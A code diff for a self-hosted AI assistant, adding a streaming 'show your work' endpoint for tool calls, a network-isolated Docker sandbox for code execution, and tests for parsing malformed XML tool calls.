    max_tokens=2048
)
# Clean response - just strip whitespace
response = raw_response.strip()
except Exception as e:
@@ -448,6 +474,63 @@ async def run_simple(req: ReasonRequest):
}
# -------------------------------------------------------------------
# /stream/thinking endpoint - SSE stream for "show your work"
# -------------------------------------------------------------------
@cortex_router.get("/stream/thinking/{session_id}")
async def stream_thinking(session_id: str):
"""
Server-Sent Events stream for tool calling "show your work" feature.
Streams real-time updates about:
- Thinking/planning steps
- Tool calls being made
- Tool execution results
- Final completion
"""
stream_manager = get_stream_manager()
queue = stream_manager.subscribe(session_id)
async def event_generator():
try:
# Send initial connection message
import json
connected_event = json.dumps({"type": "connected", "session_id": session_id})
yield f"data: {connected_event}\n\n"
while True:
# Wait for events with timeout to send keepalive
try:
event = await asyncio.wait_for(queue.get(), timeout=30.0)
# Format as SSE
event_data = json.dumps(event)
yield f"data: {event_data}\n\n"
# If it's a "done" event, close the stream
if event.get("type") == "done":
break
except asyncio.TimeoutError:
# Send keepalive comment
yield ": keepalive\n\n"
except asyncio.CancelledError:
logger.info(f"Stream cancelled for session {session_id}")
finally:
stream_manager.unsubscribe(session_id, queue)
return StreamingResponse(
event_generator(),
media_type="text/event-stream",
headers={
"Cache-Control": "no-cache",
"Connection": "keep-alive",
"X-Accel-Buffering": "no" # Disable nginx buffering
}
)
# -------------------------------------------------------------------
# /ingest endpoint (internal)
# -------------------------------------------------------------------
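The `/stream/thinking` endpoint above emits one `data:` line per JSON event, `: keepalive` comments every 30s of silence, and blank-line separators. A client can decode that framing with a small helper; `parse_sse_events` below is a hypothetical sketch for illustration, not part of this commit.

```python
import json

def parse_sse_events(lines):
    """Yield decoded JSON payloads from SSE "data:" lines,
    skipping ": keepalive" comments and blank separators."""
    for line in lines:
        if line.startswith("data: "):
            yield json.loads(line[len("data: "):])

# Frames in the shape /stream/thinking emits:
raw = [
    'data: {"type": "connected", "session_id": "demo"}',
    ": keepalive",
    "",
    'data: {"type": "done"}',
]
events = list(parse_sse_events(raw))
print([e["type"] for e in events])  # → ['connected', 'done']
```

A real client would stop consuming on the `"done"` event, mirroring the server-side `break`.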

debug_regex.py Normal file

@@ -0,0 +1,26 @@
#!/usr/bin/env python3
import re
xml = """<tool_call>
<name>execute_code</name>
<arguments>
<language>python</language>
<code>print(50 / 2)</code>
<reason>To calculate the result of dividing 50 by 2.</reason>
</arguments>
</olith>"""
pattern = r'<tool_call>(.*?)</(?:tool_call|[a-zA-Z]+)>'
matches = re.findall(pattern, xml, re.DOTALL)
print(f"Pattern: {pattern}")
print(f"Number of matches: {len(matches)}")
print("\nMatches:")
for idx, match in enumerate(matches):
print(f"\nMatch {idx + 1}:")
print(f"Length: {len(match)} chars")
print(f"Content:\n{match[:200]}")
# Now test what gets removed
clean_content = re.sub(pattern, '', xml, flags=re.DOTALL).strip()
print(f"\n\nCleaned content:\n{clean_content}")


@@ -7,6 +7,8 @@ volumes:
driver: local
neo4j_data:
driver: local
code_executions:
driver: local
services:
@@ -125,11 +127,37 @@ services:
- ./.env
volumes:
- ./cortex:/app
- /var/run/docker.sock:/var/run/docker.sock:ro
ports:
- "7081:7081"
networks:
- lyra_net
# ============================================================
# Code Sandbox (for tool execution)
# ============================================================
code-sandbox:
build:
context: ./sandbox
container_name: lyra-code-sandbox
restart: unless-stopped
security_opt:
- no-new-privileges:true
cap_drop:
- ALL
cap_add:
- CHOWN
- SETUID
- SETGID
network_mode: "none"
volumes:
- code_executions:/executions
mem_limit: 512m
cpus: 1.0
pids_limit: 100
user: sandbox
command: tail -f /dev/null
# ============================================================
# Intake
# ============================================================

sandbox/Dockerfile Normal file

@@ -0,0 +1,30 @@
FROM python:3.11-slim
# Install runtime dependencies
RUN apt-get update && apt-get install -y \
bash \
coreutils \
&& rm -rf /var/lib/apt/lists/*
# Install common Python packages for data analysis and computation
RUN pip install --no-cache-dir \
numpy \
pandas \
requests \
matplotlib \
scipy
# Create non-root user for security
RUN useradd -m -u 1000 sandbox
# Create execution directory
RUN mkdir /executions && chown sandbox:sandbox /executions
# Switch to non-root user
USER sandbox
# Set working directory
WORKDIR /executions
# Keep container running
CMD ["tail", "-f", "/dev/null"]
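Given the read-only docker socket mounted into cortex and the container name fixed in docker-compose, running a script inside the sandbox amounts to a `docker exec` against `lyra-code-sandbox`. The helper below is a hypothetical sketch of what that invocation looks like; the actual `code_executor.py` is not shown in this diff.

```python
import shlex

CODE_SANDBOX_CONTAINER = "lyra-code-sandbox"  # name from docker-compose above

def build_sandbox_argv(language, script_path):
    """Build the `docker exec` argv that would run a script staged in the
    shared /executions volume (hypothetical helper for illustration)."""
    interpreters = {"python": "python", "bash": "bash"}
    if language not in interpreters:
        raise ValueError(f"unsupported language: {language}")
    return ["docker", "exec", CODE_SANDBOX_CONTAINER,
            interpreters[language], script_path]

argv = build_sandbox_argv("python", "/executions/job.py")
print(shlex.join(argv))  # → docker exec lyra-code-sandbox python /executions/job.py
```

Because the sandbox runs with `network_mode: "none"` and all capabilities dropped, the executed script can compute but cannot reach the network or escalate privileges.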

test_ollama_parser.py Normal file

@@ -0,0 +1,103 @@
#!/usr/bin/env python3
"""
Test OllamaAdapter XML parsing with real malformed examples.
"""
import asyncio
import sys
sys.path.insert(0, '/home/serversdown/project-lyra/cortex')
from autonomy.tools.adapters.ollama_adapter import OllamaAdapter
async def test_parser():
adapter = OllamaAdapter()
# Test cases with actual malformed XML we've seen
test_cases = [
{
"name": "Malformed closing tag 1",
"xml": """<tool_call>
<name>execute_code</name>
<arguments>
<language>python</language>
<code>print(50 / 2)</code>
<reason>To calculate the result of dividing 50 by 2.</reason>
</arguments>
</olith>"""
},
{
"name": "Malformed closing tag 2",
"xml": """<tool_call>
<name>execute_code</name>
<arguments>
<language>python</language>
<code>print(60 / 4)</code>
</arguments>
<reason>To calculate 60 divided by 4 using Python.</reason>
</LTRB"""
},
{
"name": "Partial XML (missing opening)",
"xml": """<arguments>
<language>python</language>
<code>result = 35 / 7; result</code>
</arguments>
<reason>To calculate the division of 35 by 7 using Python.</reason>
</tool_call>"""
},
{
"name": "Correct XML",
"xml": """<tool_call>
<name>execute_code</name>
<arguments>
<language>python</language>
<code>print(100 / 4)</code>
<reason>Calculate division</reason>
</arguments>
</tool_call>"""
},
{
"name": "XML with surrounding text",
"xml": """Let me help you with that.
<tool_call>
<name>execute_code</name>
<arguments>
<language>python</language>
<code>print(20 / 4)</code>
<reason>Calculate the result</reason>
</arguments>
</tool_call>
The result will be shown above."""
}
]
print("=" * 80)
print("Testing OllamaAdapter XML Parsing")
print("=" * 80)
for test in test_cases:
print(f"\nTest: {test['name']}")
print("-" * 80)
print(f"Input XML:\n{test['xml'][:200]}{'...' if len(test['xml']) > 200 else ''}")
print("-" * 80)
try:
result = await adapter.parse_response(test['xml'])
print(f"✅ Parsed successfully!")
print(f" Content: {result.get('content', '')[:100]}")
print(f" Tool calls found: {len(result.get('tool_calls') or [])}")
if result.get('tool_calls'):
for idx, tc in enumerate(result['tool_calls']):
print(f" Tool {idx + 1}: {tc.get('name')} with args: {tc.get('arguments')}")
except Exception as e:
print(f"❌ Error: {e}")
print()
if __name__ == "__main__":
asyncio.run(test_parser())

test_thinking_stream.html Normal file

@@ -0,0 +1,286 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Lyra - Show Your Work</title>
<style>
* {
margin: 0;
padding: 0;
box-sizing: border-box;
}
body {
font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
background: #1a1a1a;
color: #e0e0e0;
height: 100vh;
display: flex;
flex-direction: column;
}
.container {
display: flex;
height: 100%;
overflow: hidden;
}
.panel {
flex: 1;
display: flex;
flex-direction: column;
padding: 20px;
overflow: hidden;
}
.panel-header {
font-size: 18px;
font-weight: bold;
margin-bottom: 15px;
padding-bottom: 10px;
border-bottom: 2px solid #333;
}
.chat-panel {
border-right: 1px solid #333;
}
.thinking-panel {
background: #0d0d0d;
}
.messages, .thinking-output {
flex: 1;
overflow-y: auto;
padding: 10px;
background: #222;
border-radius: 8px;
margin-bottom: 15px;
}
.message {
margin-bottom: 15px;
padding: 10px;
border-radius: 6px;
line-height: 1.5;
}
.user-message {
background: #1e3a5f;
align-self: flex-end;
}
.assistant-message {
background: #2d2d2d;
}
.thinking-event {
margin-bottom: 10px;
padding: 8px 12px;
border-radius: 4px;
font-size: 14px;
font-family: 'Courier New', monospace;
animation: fadeIn 0.3s;
}
@keyframes fadeIn {
from { opacity: 0; transform: translateY(-5px); }
to { opacity: 1; transform: translateY(0); }
}
.event-thinking { background: #1a3a1a; color: #90ee90; }
.event-tool_call { background: #3a2a1a; color: #ffa500; }
.event-tool_result { background: #1a2a3a; color: #87ceeb; }
.event-done { background: #2a1a3a; color: #da70d6; }
.event-error { background: #3a1a1a; color: #ff6b6b; }
.input-area {
display: flex;
gap: 10px;
}
input {
flex: 1;
padding: 12px;
background: #2d2d2d;
border: 1px solid #444;
border-radius: 6px;
color: #e0e0e0;
font-size: 14px;
}
button {
padding: 12px 24px;
background: #4a7c59;
border: none;
border-radius: 6px;
color: white;
cursor: pointer;
font-weight: bold;
transition: background 0.2s;
}
button:hover {
background: #5a9c69;
}
button:disabled {
background: #333;
cursor: not-allowed;
}
.status {
padding: 8px;
text-align: center;
font-size: 12px;
color: #888;
}
.status.connected { color: #90ee90; }
.status.disconnected { color: #ff6b6b; }
/* Mobile responsive */
@media (max-width: 768px) {
.container {
flex-direction: column;
}
.chat-panel {
border-right: none;
border-bottom: 1px solid #333;
}
}
</style>
</head>
<body>
<div class="container">
<!-- Chat Panel -->
<div class="panel chat-panel">
<div class="panel-header">💬 Chat</div>
<div class="messages" id="messages"></div>
<div class="input-area">
<input
type="text"
id="userInput"
placeholder="Ask something that requires tools... (e.g., 'Calculate 50/2 using Python')"
onkeypress="if(event.key==='Enter') sendMessage()"
>
<button onclick="sendMessage()" id="sendBtn">Send</button>
</div>
</div>
<!-- Thinking Panel -->
<div class="panel thinking-panel">
<div class="panel-header">🧠 Show Your Work</div>
<div class="thinking-output" id="thinking"></div>
<div class="status" id="status">Not connected</div>
</div>
</div>
<script>
const SESSION_ID = 'thinking-demo-' + Date.now();
let eventSource = null;
// Connect to thinking stream
function connectThinkingStream() {
if (eventSource) {
eventSource.close();
}
const url = `http://localhost:7081/stream/thinking/${SESSION_ID}`;
eventSource = new EventSource(url);
eventSource.onopen = () => {
document.getElementById('status').textContent = '🟢 Connected to thinking stream';
document.getElementById('status').className = 'status connected';
};
eventSource.onmessage = (event) => {
try {
const data = JSON.parse(event.data);
addThinkingEvent(data);
} catch (e) {
console.error('Failed to parse event:', e);
}
};
eventSource.onerror = () => {
document.getElementById('status').textContent = '🔴 Disconnected from thinking stream';
document.getElementById('status').className = 'status disconnected';
setTimeout(connectThinkingStream, 2000); // Reconnect after 2s
};
}
function addThinkingEvent(event) {
const thinking = document.getElementById('thinking');
const eventDiv = document.createElement('div');
eventDiv.className = `thinking-event event-${event.type}`;
if (event.type === 'connected') {
eventDiv.textContent = `✓ Connected (Session: ${event.session_id})`;
} else if (event.data && event.data.message) {
eventDiv.textContent = event.data.message;
} else {
eventDiv.textContent = JSON.stringify(event.data);
}
thinking.appendChild(eventDiv);
thinking.scrollTop = thinking.scrollHeight;
}
async function sendMessage() {
const input = document.getElementById('userInput');
const message = input.value.trim();
if (!message) return;
// Add user message to chat
addMessage('user', message);
input.value = '';
// Disable send button
const sendBtn = document.getElementById('sendBtn');
sendBtn.disabled = true;
sendBtn.textContent = 'Thinking...';
// Clear thinking panel
document.getElementById('thinking').innerHTML = '';
try {
const response = await fetch('http://localhost:7081/simple', {
method: 'POST',
headers: {
'Content-Type': 'application/json',
},
body: JSON.stringify({
session_id: SESSION_ID,
user_prompt: message,
backend: 'SECONDARY'
})
});
const data = await response.json();
addMessage('assistant', data.draft);
} catch (error) {
addMessage('assistant', `Error: ${error.message}`);
} finally {
sendBtn.disabled = false;
sendBtn.textContent = 'Send';
}
}
function addMessage(role, content) {
const messages = document.getElementById('messages');
const messageDiv = document.createElement('div');
messageDiv.className = `message ${role}-message`;
messageDiv.textContent = content;
messages.appendChild(messageDiv);
messages.scrollTop = messages.scrollHeight;
}
// Connect on page load
connectThinkingStream();
</script>
</body>
</html>

test_tools.py Normal file

@@ -0,0 +1,91 @@
#!/usr/bin/env python3
"""
Quick test script for tool calling system.
Tests the components before full endpoint integration.
"""
import asyncio
import sys
import os
# Add cortex to path
sys.path.insert(0, '/home/serversdown/project-lyra/cortex')
# Set required env vars
os.environ['ENABLE_CODE_EXECUTION'] = 'true'
os.environ['ENABLE_WEB_SEARCH'] = 'true'
os.environ['CODE_SANDBOX_CONTAINER'] = 'lyra-code-sandbox'
from autonomy.tools.registry import get_registry
from autonomy.tools.executors.code_executor import execute_code
from autonomy.tools.executors.web_search import search_web
async def test_code_executor():
"""Test code execution in sandbox."""
print("\n=== Testing Code Executor ===")
result = await execute_code({
"language": "python",
"code": "print('Hello from sandbox!')\nprint(2 + 2)",
"reason": "Testing sandbox execution"
})
print(f"Result: {result}")
return result.get("stdout") == "Hello from sandbox!\n4\n"
async def test_web_search():
"""Test web search."""
print("\n=== Testing Web Search ===")
result = await search_web({
"query": "Python programming",
"max_results": 3
})
print(f"Found {result.get('count', 0)} results")
if result.get('results'):
print(f"First result: {result['results'][0]['title']}")
return result.get("count", 0) > 0
async def test_registry():
"""Test tool registry."""
print("\n=== Testing Tool Registry ===")
registry = get_registry()
tools = registry.get_tool_definitions()
print(f"Registered tools: {registry.get_tool_names()}")
print(f"Total tools: {len(tools) if tools else 0}")
return len(tools or []) > 0
async def main():
print("🧪 Tool System Component Tests\n")
tests = [
("Tool Registry", test_registry),
("Code Executor", test_code_executor),
("Web Search", test_web_search),
]
results = {}
for name, test_func in tests:
try:
passed = await test_func()
results[name] = "✅ PASS" if passed else "❌ FAIL"
except Exception as e:
results[name] = f"❌ ERROR: {str(e)}"
print("\n" + "="*50)
print("Test Results:")
for name, result in results.items():
print(f" {name}: {result}")
print("="*50)
if __name__ == "__main__":
asyncio.run(main())